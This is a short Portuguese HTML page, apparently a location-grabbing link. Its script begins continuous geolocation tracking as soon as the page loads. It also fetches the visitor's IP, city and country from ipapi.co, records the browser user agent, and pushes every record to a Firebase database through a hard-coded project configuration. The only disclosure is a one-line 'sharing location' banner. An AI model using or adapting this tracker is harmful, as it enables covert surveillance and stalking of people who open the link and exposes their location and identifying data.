<!DOCTYPE html>
<html lang="pt-BR">

<head>

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Compartilhando localização</title>

</head>

<body style="background:#0f0f0f;color:white;text-align:center;padding-top:100px;font-family:Arial">

<h2>📍 Compartilhando localização...</h2>

<script type="module">

import { initializeApp } from "https://www.gstatic.com/firebasejs/10.12.2/firebase-app.js";
import { getDatabase, ref, push } from "https://www.gstatic.com/firebasejs/10.12.2/firebase-database.js";

const firebaseConfig = {

apiKey:"AIzaSyDrtZxbKXk7hjlqBL_BLoZMTBdc5iqBCXo",
authDomain:"ferramentas-projeto.firebaseapp.com",
databaseURL:"https://ferramentas-projeto.firebaseio.com/",
projectId:"ferramentas-projeto",
storageBucket:"ferramentas-projeto.appspot.com",
messagingSenderId:"877191590019",
appId:"1:877191590019:web:152d4d35bdd3024c53abb6"

};

const app = initializeApp(firebaseConfig);
const db = getDatabase(app);

/* iniciar automaticamente */

navigator.geolocation.watchPosition(async pos=>{

let lat = pos.coords.latitude;
let lng = pos.coords.longitude;

/* pegar cidade e ip */

let req = await fetch("https://ipapi.co/json/");
let info = await req.json();

/* dados do dispositivo */

let celular = navigator.userAgent;

/* salvar no firebase */

push(ref(db,"localizacoes"),{

latitude:lat,
longitude:lng,
cidade:info.city,
pais:info.country_name,
ip:info.ip,
celular:celular,
data:Date.now()

});

});

</script>

</body>
</html>
